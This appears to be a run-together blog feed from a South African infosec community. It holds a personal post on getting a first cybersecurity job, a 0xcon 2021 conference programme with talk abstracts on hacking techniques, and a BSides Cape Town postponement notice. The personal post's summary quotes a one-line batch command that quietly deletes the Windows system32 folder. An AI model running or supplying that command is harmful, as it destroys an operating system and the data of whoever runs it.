<p>Tangent to my story, I did not pursue the CompTIA A+ N+ etc. recognition certification because during my studies, I decided that I wanted to do pentesting/hacking. And from what I understand, you only need to understand the networking and server concepts but don’t really need to have the CompTIA recognition - It’s probably nice to have.</p>
<p>What I wanted is basically, I wanted to break into things legally and get paid to do it. Why you may ask, because no system will be the same, no network will be the same, environments are forever changing and each new one brings on a new challenge and that’s what I wanted.</p>
<p>So, I now had certifications, what now? I studied hard but I have no practical skills, no way of practicing either since we only had 1 laptop in the house, and it was my wife’s work laptop. So, trying to hack her laptop or messing around with potentially dangerous items could be detrimental to her business.</p>
<p><img src="https://media.giphy.com/media/hL9q5k9dk9l0wGd4e0/giphy.gif" alt="Loading" class="align-center" /></p>
<h3 id="skills-loading-in-progress">Skills loading in progress</h3>
<p>This is when I discovered TryHackMe <a href="https://tryhackme.com/">THM</a> and HackTheBox <a href="https://www.hackthebox.com/">HTB</a>. TryHackMe was my go-to platform since they offered a more convenient option when practicing skills than HackTheBox at the time – it could be different now, I’m not sure. But I made sure I at least did one machine a day in THM to keep my skills relevant [on free only, because broke]. I nicely got my rank up and got my skill level to a decent level for any entry level job, or so I thought.</p>
<p>Another tangent – in the time of THM and HTB, I also discovered HackerOne and Hacker101[for CTFs]. Youtube channels of <a href="https://www.youtube.com/c/TheCyberMentor">The Cyber Mentor</a> who I have been following long before I got into cyber sec, <a href="https://www.youtube.com/c/JohnHammond010">John Hammond</a>, <a href="https://www.youtube.com/c/DavidBombal">David Bombal</a>, <a href="https://www.youtube.com/c/HackerSploit">HackerSploit</a> and <a href="https://www.youtube.com/c/NullByteWHT">NullByte</a>. I also learnt that I needed to re-evaluate my twitter account to tailor it to my passion, as well as learn discord and get involved in groups there.</p>
<p><img src="https://media.giphy.com/media/EQKtfl2Np0ME05furr/giphy.gif" alt="Unemployment" class="align-center" /></p>
<h3 id="the-wild-hunt">The Wild Hunt</h3>
<p>Now the real challenge was about to begin, and this was finding and landing that first job in cyber sec. and to make it even harder let’s do it during a pandemic. I had more failures than success in this area, <span style="color: yellow">but more on that later</span>, and it was starting to feel like it was never going to happen. I had my CV on all the ‘major’ recruitment sites and I was looking for any Entry Level Job within infosec. I was searching for keywords such as: Entry Level / No experience / Minimal experience / willing to learn / remote / work from home. Job titles I searched for started out like the following: Junior Pen tester / Cyber Sec Analyst / IT Analyst / Pentester / Blue Teamer / SOC Analyst / IT Security Analyst. There were instances where I would have received some communication regarding an application, first round interviews, very few screening calls, but unfortunately I still had no luck.</p>
<p>I then switched up the search criteria on titles to the following in the hopes of landing more interviews. I started searching: Database admin / IT admin / IT support / IT helpdesk. Because I had experience in these areas and thought if I could get my foot in the door, I could work my way up into where I wanted to be.</p>
<p>This also didn’t help, I was still in the same position as before, the change didn’t make any difference. I still wasn’t getting any interviews or callbacks etc. One thing I did learn however from changing my search titles, was that I was selling myself short. If you want to be in infosec, persevere, search for that title, search for that job, go after that company and don’t deviate.</p>
<p>I eventually started sending my CV to companies who weren’t looking and said that when they are ready to open the doors for new people to keep me in mind.
<strong><span style="color: yellow">“You lose 100% of the chances you don’t take”[2]</span></strong></p>
<p>This stuck with me throughout my journey, I figured if I backed myself to study and make it through that, I should back myself in my pursuit to find that job.
<strong><span style="color: cyan">Stats for the geeks:</span></strong></p>
<p>Just a few rough numbers to paint a picture of how difficult it was to get into infosec, in an entry level position.
<span style="color: cyan">In 2020:</span></p>
<table>
<tbody>
<tr>
<td>Jobs applied for</td>
<td>> 180 [approx.]</td>
</tr>
<tr>
<td>Rejections</td>
<td>>= 126 [approx.]</td>
</tr>
<tr>
<td>Feedback [good/bad]</td>
<td>< 50 [from recruiters regarding my application]</td>
</tr>
<tr>
<td>Interviews</td>
<td>17 interviews</td>
</tr>
<tr>
<td>2nd Round Interviews</td>
<td>4</td>
</tr>
<tr>
<td>Job Landed</td>
<td>0</td>
</tr>
</tbody>
</table>
<p>As you can see it was a really grim picture to the point where at the end of 2020, somewhere around mid-November, I decided to take a break from applying and searching for jobs. I then started looking at how I could stand out from the rest in 2021.</p>
<p>I started looking at how I could make myself more marketable and also started asking people in the industry what is it that I’m doing wrong and how do I go about getting noticed. I reached out to a few people in twitter sphere and I will be honest very few came back to help. One person who did help me was <a href="https://twitter.com/4n6lady">4n6lady</a>. She asked for my CV at the time and took the time to give me a few pointers on how to tailor my CV, to promote my skills, platforms I’ve been using, tools and experience to help me land that job in infosec.</p>
<p>With her advice and the help of my wife, I modified my CV highlighting my skills and all the necessary tools that I have been using. The platforms that I have been practising on [THM and HTB], and the communities that I belonged to.</p>
<p>I also took the time to learn a programming language, as this would make pentesting easier going forward. I started a few Python programming courses in the beginning of January 2021 and finished all 4 courses by the end of March 2021.</p>
<p>So with a revitalised mind set after my December break, the new look CV - modified to catch the eye of the right recruiter and a few additional feathers in my cap for Infosec, I was back on the prowl and looking for the right job.</p>
<p><img src="https://media.giphy.com/media/3otPoN361gYGbwqNgc/giphy.gif" alt="He shoots he scores" class="align-center" /></p>
<h3 id="he-shoots-he-scores">He shoots, He scores</h3>
<p>My job hunting began with new vigour and new hope, my CV went out and I set alerts for myself on the various platforms. So that as soon as something new went live, it would get it immediately and apply.</p>
<p>It was slow in the beginning but I eventually came across a <strong><span style="color: yellow">status post</span></strong> on LinkedIn that they were looking for consultants who wanted to get into infosec – little to no experience required and would be willing to help with certifications if you have none.</p>
<p>I thought this is it, if I can’t land this then I need to really re-evaluate what I’m looking for and where I want to be [I’m sure some of you have hit this wall before]. Sent my CV, had an interview, waiting a very long time – almost eternity – for feedback, any feedback really. And I got the job as a contractor for 6 months with the company, as a cyber security consultant – which evolved into a 12 month contract [currently in progress] for Infosec Consulting ZA.</p>
<p>The company has since grown and we now have 6 consultants in total, with varying levels of experience, ranging from 0 to 20 years. Some with certifications and some without, the CEO/Director of the company Bevan Lane, has lived up to his promise of helping you with certifications. I am now an ISO/IEC 27001 Lead Implementer, certified by PECB.
<span style="color: yellow">My next ambitious step is to get my OSCP and if I can create a little pentest division within this company.</span></p>
<p><img src="https://media.giphy.com/media/g9582DNuQppxC/giphy-downsized-large.gif" alt="The Great gatsby" class="align-center" /></p>
<h3 id="mamma-i-made-it">Mamma I made it</h3>
<p>I’m happy to have made it into infosec, it’s a tough industry to get into and the strange part is – it’s a known problem. After getting into the industry somehow my social media channels new I made it in and I started seeing posts about how tough it is to get into cyber sec/infosec.</p>
<p>Posts about the ‘gatekeepers’ of infosec and companies searching for candidates who could do it all, had it all and were willing to take home less than what they were valued. I could believe what I was reading, but I could relate because I went through this.</p>
<p>I understand that HR won’t always know what to look for, understand the terms and that sometimes job ads are just cut and paste, but it shouldn’t be so hard. I have also heard of the recruiters who, when reviewing a CV, use CTRL+F and search your CV for the keywords they put in the job ads, and if it’s not there you get ‘tossed’ to the side never to be looked at again – unless they are desperate.</p>
<p>I’m not saying companies should take anyone, but at least give the CV a proper review and if the candidate doesn’t have what it takes to be in your company RIGHT NOW, give them that constructive criticism/feedback.</p>
<p>I would have loved it if someone told me what I was doing wrong in my applications or what areas I needed to focus to stand a better chance to land that interview.
So here are my tips to you:</p>
<ol>
<li>
<p>Modify your CV to highlight your skills:<br />
Tools – Nmap, Wireshark, Burpsuite etc.<br />
OS that you familiar with – Windows / Linux / MAC OS<br />
platform you are familiar with – THM / HTB / Hacker1 etc.</p>
</li>
<li>Learn a programming language, enough to be able to read the code and understand at least 80% of it and add it as part of your skills.</li>
<li>Put the important things first, credentials should be on the first page of your CV along with the items I have mentioned.</li>
<li>Put your most recent duties, from your previous job or current job, on the first page as well – recruiters will want to see what you are doing now rather than what you did. You want to hook them to your CV and once they are there, they can read the rest.</li>
<li>Ask someone who is in the industry if they would mind reviewing your CV, try for someone who has a position you want. Don’t be discouraged if you don’t get a response, but don’t stop asking.</li>
<li>Highlight your Expertise, list the things you’re good at – this is the time to boast about how good you are in certain areas.</li>
<li>Don’t lie on your CV, a very basic tip but also very important – if you can’t do something, be honest and say so. It shows integrity and that you are aware of what you need to work on.</li>
<li>Do your research on Colleges/Institutions that you’re thinking of using for your studies, not all of them are accredited or recognized by any specific body.</li>
</ol>
<p>Do all the above and keep applying, it will eventually happen for you like it did for me. It’s easy to say this now sitting on the other side, but I went through countless applications, endless rejections [I’m currently still getting rejection emails from companies I applied to last year]. But all I needed is someone to take a chance on me, and someone will take a chance on you.</p>
<p><strong>Footnote</strong><br />
I would like to give a shoutout to all the people who helped me, in their own way, to get me here.<br />
Leigh Botha – Director of L&S People Solutions<br />
Bevan Lane – Director of Infosec Consulting ZA<br />
<a href="https://twitter.com/4n6lady">4n6lady</a> – Twitter contact who helped me with insight into getting into the industry.</p>
<p>You all made it possible.</p>
<p>Thank you for reading to the end but before you leave take a moment to check out the below, you’ll thank me later.</p>
<p><img src="https://media.giphy.com/media/YOvOkaS5ZKfimDIgwJ/giphy.gif" alt="Bad_Boys" class="align-center" /></p>
<h3 id="pay-it-forward">Pay It Forward</h3>
<p>If you have the knowledge and skills but need that extra boost to get certified, then check out <a href="https://hacksouth.africa/community/Pay-It-Forward/">this blog</a>, Hack South is giving away a limited amount of PWK vouchers.</p>
<p><img src="/assets/images/OSCP/oscp.png" alt="OSCP" class="align-center" /></p>
<h3 id="be-a-part-of-something-great">Be a Part of Something Great</h3>
<p>If you want to be part of a growing community of Hackers/Tech Enthusiasts/Tinkerers and all round great people then <a href="https://hacksouth.africa/community/Joining-Hack-South/">join</a> the <a href="https://hacksouth.africa/">Hack South</a> Discord.</p>
<p>[1] The code is for reference and educational purposes only, I take no responsibility for the malicious use of the code by the reader.<br />
[2] This is an adaptation of Wayne Gretzky’s - You miss 100% of the shots you don’t take.</p>Sp3ctrlM0nki3My journey into cyber security/infosec. By Sp3ctrlM0nki3 So, I’ll start at the beginning. My passion for cyber sec started in a computer lab in high school where I created my first ‘virus’. It was a little .bat virus which would remove the System 32 Folder from your windows system. del c:WINDOWSsystem32*.*/q [1]0xcon 20212021-11-10T00:00:00+00:002021-11-10T00:00:00+00:00https://hacksouth.africa/conferences/0xcon-2021<p>Taking place on Saturday, <strong>13 November</strong> 2021 from <strong>09:00 to 15:00</strong> (SAST).</p>
<p>0xcon started in 2017 as a South African conference aimed at building the Gauteng and ZA infosec community. The conference welcomes both the new and experienced alike, and works hard to keep things open and free to everyone.</p>
<p>Due to the pandemic, this year’s conference will be streamed to YouTube with discussion on the <a href="https://discord.gg/hacksouth">Hack South Discord server</a>.
<!--more--></p>
<h2 id="how-to-participate">How to participate</h2>
<ul>
<li>Check out our <a href="https://www.linkedin.com/events/0xcon20216859938708657844224/">LinkedIn event and RSVP</a>. Share this with your friends and colleagues!</li>
<li>On the day, the event will be <a href="https://www.youtube.com/watch?v=vPsx83lhd6w">streamed on YouTube</a></li>
<li>Please join <a href="https://discord.gg/hacksouth">Hack South Discord server</a> for discussion and questions during the event.</li>
<li>We will host some polls on Discord to gauge how people feel about certain topics…</li>
</ul>
<h3 id="event-program">Event Program</h3>
<p><img src="/assets/images/0xcon/2021program.jpg" alt="Program" class="align-center" /></p>
<h2 id="unlocking-keeloq---rogan-dawes">Unlocking KeeLoq - Rogan Dawes</h2>
<p>KeeLoq Remote Keyless Entry systems make use of radio frequency transmissions to operate and have many known weaknesses. This presentation is a journey into bringing existing research together with manufacturer documentation to make implementing a complete Keeloq solution practical, ultimately repurposing a commercial receiver as part of a home automation system integration project.</p>
<p>I will demonstrate how I recovered the manufacturer key by extracting and reverse engineering the receiver’s firmware using a JTAG adapter and Ghidra. Next, I will cover decoding and decrypting the KeeLoq transmissions (verified using a logic analyzer), cloning the captured serial and sequence numbers to a new transmitter, and finally, how to export the received transmissions to a home automation system via an add-on WiFi-capable microcontroller.</p>
<p><em>About Rogan</em></p>
<p>Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header</p>
<h2 id="2021-year-in-review---the-year-of-the-supply-chain---jared-naude">2021 Year in Review - The year of the Supply Chain - Jared Naude</h2>
<p>Looking back at events that have taken place for lessons that can be learned is an important ingredient to enable forward insight, especially in the cyber security space. In this talk, I will go through the various security news, events and incidents of note that occurred in 2021 while adding some commentary and analysis from myself. This will primarily focus on the various supply chain attacks (SolarWinds, Codecov, Kaseya, etc) but will also cover trends in ransomware and malware, disinformation and Apple’s CSAM debacle.</p>
<p><em>About Jared</em></p>
<p>Jared is a Cloud Architect that specializes in enterprise cloud architecture and security; he is passionate about helping large organizations with architecting, building, securing and operationalizing cloud environments. Jared’s research interests and policy advocacy work involves cyber security issues that touch national security interests such as encryption, privacy, surveillance and disinformation.</p>
<h2 id="why-the-options-pattern-is-great-for-security---dima-kotik">Why the Options Pattern is Great for Security - Dima Kotik</h2>
<p>Secure coding and functional programming are rarely mentioned in the same sentence. What if by applying a functional programming construct, we could write more secure code? Enter the Options Pattern, a hidden gem in securing your approach to object initialization.</p>
<p>The options pattern is a modern object initialization idiom. It involves writing a set of second-order functions returning options that roughly correspond to the initialization parameters. An option receives the object for initialization and applies a narrow modification to it.</p>
<p>The options pattern provides security benefits as side effects of encapsulation and separation of concerns. The main benefit is that it can make complex objects difficult to misuse, a necessary quality for modern cryptography, networking, and low-level libraries. It aids with code readability, reliability, and resilience. When properly implemented, the options pattern ensures sensible defaults, detects configuration conflicts at initialization, and provides logical grouping and consistency with entangled parameters.</p>
<p>In this talk, the speaker will explain how wider adoption of the options pattern improves code security for any project. Several examples will be examined and described as a demonstration of how to properly apply the secure coding options pattern in your own code.</p>
<p><em>About Dima</em></p>
<p><a href="https://twitter.com/dkotik">Dima Kotik</a> is an application security engineer and lead curriculum contributor for Go, Python, and ES6 at <a href="https://twitter.com/SecurityJourney">@SecurityJourney</a>. Aspiring to become a gentle FOSS maverick by age 60.</p>
<h2 id="assless-chaps-a-novel-combination-of-prior-work-to-crack-mschapv2-fast-or-why-mschapv2-is-so-broken-its-showing-its-whole-ass---dominic-white--michael-kruger">Assless Chaps: a novel combination of prior work to crack MSCHAPv2, fast (or why MSCHAPv2 is so broken, its showing its whole ass) - Dominic White & Michael Kruger</h2>
<p>Cracking intercepted MSCHAPv2 challenge/response pairs from Wi-Fi or VPN attacks has long been known to be possible. However, unless the underlying cleartext password was common, this can take frustratingly long. Especially, for at-the-same-time attacks like <a href="https://sensepost.com/blog/2015/improvements-in-rogue-ap-attacks-mana-1%2F2/" title="Improvements in Rogue AP attacks">the auto-crack-and-add we proposed in 2014</a> <a href="https://youtu.be/i2-jReLBSVk?t=1380" title="Manna from Heaven">and presented at DEF CON</a>. We’ll combine some prior work and release tooling to show how even extremely large hashlists can be run through in seconds.</p>
<p>MSCHAPv2 has several weaknesses, the first is that one doesn’t need the clear-text password, as merely having the MD4 hash (aka NT hash) of the password is good enough to prove to either a client or authenticator you know the password. This means we can use a <a href="https://www.youtube.com/watch?v=OQD3qDYMyYQ" title="What the Shuck? Layered Hash Shucking">technique proposed in 2020 by Sam Croley called hash shucking</a> to use large NT hash lists such as the <a href="https://haveibeenpwned.com/Passwords" title="Pwned Passwords">Have I Been Pwned set</a> to determine the NT hash used in the exchange. We’ll go through the theory of MSCHAPv2, why the NT hash is useful and how to use it, as well as how Hashcat modes for cracking it were developed.</p>
<p>The second weakness relates to the <a href="https://web.archive.org/web/20160120152007/http://cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/" title="Divide and Conquer: Cracking MS-CHAPv2">work done by Moxie Marlinspike and David Hulton in 2012</a> where they found that because MSCHAPv2 breaks the NT hash into three parts, and pads the last two bytes with NULLs, it’s trivial to brute force this part (the ass). Then a brute force of the first two parts is performed using only a single DES round by iterating the entire DES keyspace with an FPGA. However, most of us still don’t have our own MSCHAPv2 cracking FPGA rigs, and this attack isn’t widely available or practical. Instead, if we limit our input hashlist to only those with the matching last two bytes, we can perform a far more efficient hash shucking attack against the exchange. We will go through the theory of MSCHAPv2 in use here and the optimisations devised with an associated tool.</p>
<p>Finally, we’ll end on why we think MSCHAPv2 needs to finally die the death it has deserved for so very long.</p>
<p><em>About Dominic and Michael</em></p>
<ul>
<li><a href="https://twitter.com/singe">@singe</a> - Guy, Some @ Orange Cyberdefense’s SensePost team</li>
<li><a href="https://twitter.com/cablethief">@cablethief</a> - Random, Joe @ Orange Cyberdefense’s SensePost team</li>
</ul>
<h2 id="attack-and-defense-techniques-with-kubernetes---vignesh-c">Attack and Defense techniques with kubernetes - Vignesh C</h2>
<p>In modern day environment blue team had to face lot of issues with container security, This talk aims to address the overall summary of Kubernetes security and common mitre matrix scenarios, It also explains how to implement end to end fully hardened environment which will help to securely monitor the cloud and containers.</p>
<p><em>About Vignesh</em></p>
<p>Vigneshc has a few security hall-of-fames and CTF wins. He has worked on a wide range of topics in security, including Red Teaming, Infrastructure Pentest, Purple Teaming, Forensics & Incidence Response, Cyber Threat Intelligence, Cyber Footprint Assessment, and Application Pentesting. Pentester and just another guy whom plays around with 0’s and 1’s.</p>
<h2 id="beyond-string-theory-symbolically-enhanced-reverse-engineering---keith-makan">Beyond String Theory: Symbolically Enhanced Reverse Engineering - Keith Makan</h2>
<p>Reverse engineering software from binary executable forms remains a key challenge for modern software analysis. Common techniques include running good old strings or grep and hoping for the best before trying to derive control flow graphs, call stacks and resolve cross references via complex disassembly frameworks. Beyond cursory string inspection, symbolic execution gives us the power to emulate execution, derive concrete test cases and prove reachability to interesting points in a static binary, and with Angr we can leverage that power in Python. In this talk the speaker will unpack basic concepts introducing symbolic execution in the Angr Framework and show methods to apply this to discovering content secrets, log data, etc.) in ways strings or static inspection would be incapable of. The talk walks through examples from real world binaries including common utilities as well as CTF challenge binaries</p>
<p><em>About Keith</em></p>
<p><a href="https://twitter.com/kmsecurity3">Keith Makan</a> is a security consultant with 6+ years of experience in delivering secure assessment of code and applications in various industries spanning companies across the globe. Keith has consulted at large businesses in software/internet based technologies and remains eager to learn new ways to assess and scrutinize modern applications. Keith’s expertise include Secure Code Review in various languages, Android and Web Application assessment, Network and Infrastructure assessment as well as a growing expertise in Reverse Engineering, Binary Analysis and Social Engineering.</p>
<p>During the span of his career he has published two books in the information security field namely, “The Android Security Cookbook” and “Penetration Testing with the Bash Shell”, and is currently pursuing his masters in Computer Science with a focus on Binary Symbolic Execution.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We look forward to seeing everyone at our event!</p>0xconTaking place on Saturday, 13 November 2021 from 09:00 to 15:00 (SAST). 0xcon started in 2017 as a South African conference aimed at building the Gauteng and ZA infosec community. The conference welcomes both the new and experienced alike, and works hard to keep things open and free to everyone. Due to the pandemic, this year’s conference will be streamed to YouTube with discussion on the Hack South Discord server.BSides 2021 Update: Postponement and reviewed Plans2021-11-03T00:00:00+00:002021-11-03T00:00:00+00:00https://hacksouth.africa/conferences/Bsides-Cape-Town-postponement<p>Currently, there is a lot of uncertainty regarding Lockdown restrictions for the beginning of December as the inevitable fourth wave approaches.</p>
<h3 id="2021-conference-plans">2021 Conference Plans</h3>
<p>The plan was for a hybrid conference, but because of the lockdown uncertainty and, more importantly, since the previous BSIDES Cape Town took place in 2019 (2 years ago!), the organisers decided that an in-person conference would be superb. Therefore, the December 2021 BSIDES Cape Town conference has been postponed to March/April 2022 to allow for both an in-person conference and in-person workshops.</p>
<p>This extension does not change the plans for December 2022 BSIDES Cape Town, which will still occur. In the meantime, to cure your BSIDES Cape Town withdrawal, you can find the recordings of previous talks on the <a href="https://www.youtube.com/c/BSidesCapeTown/videos">youtube channel</a></p>
<p>The organisers will be in touch with the speakers in the coming weeks to confirm availability with the extension.
Instead of the conference, there will only be a small meetup on or around the 4th of December; we will give more information closer to the date.</p>
<h3 id="conclusion">Conclusion</h3>
<p>We want to thank everyone who got in touch to volunteer and those who responded to the CFP; We will be in touch to check whether you can attend the meetup.
Please share this among the community so that everyone is aware!</p>
<p>If you have any specific questions or thoughts don’t hesitate to email the organisers at:<br />
<a href="mailto:organisers@bsidescapetown.co.za">organisers@bsidescapetown.co.za</a></p>MegladonCurrently, there is a lot of uncertainty regarding Lockdown restrictions for the beginning of December as the inevitable fourth wave approaches. 2021 Conference Plans The plan was for a hybrid conference, but because of the lockdown uncertainty and, more importantly, since the previous BSIDES Cape Town took place in 2019 (2 years ago!), the organisers decided that an in-person conference would be superb. Therefore, the December 2021 BSIDES Cape Town conference has been postponed to March/April 2022 to allow for both an in-person conference and in-person workshops. This extension does not change the plans for December 2022 BSIDES Cape Town, which will still occur. In the meantime, to cure your BSIDES Cape Town withdrawal, you can find the recordings of previous talks on the youtube channel The organisers will be in touch with the speakers in the coming weeks to confirm availability with the extension. Instead of the conference, there will only be a small meetup on or around the 4th of December; we will give more information closer to the date. Conclusion We want to thank everyone who got in touch to volunteer and those who responded to the CFP; We will be in touch to check whether you can attend the meetup. Please share this among the community so that everyone is aware! If you have any specific questions or thoughts don’t hesitate to email the organisers at: organisers@bsidescapetown.co.za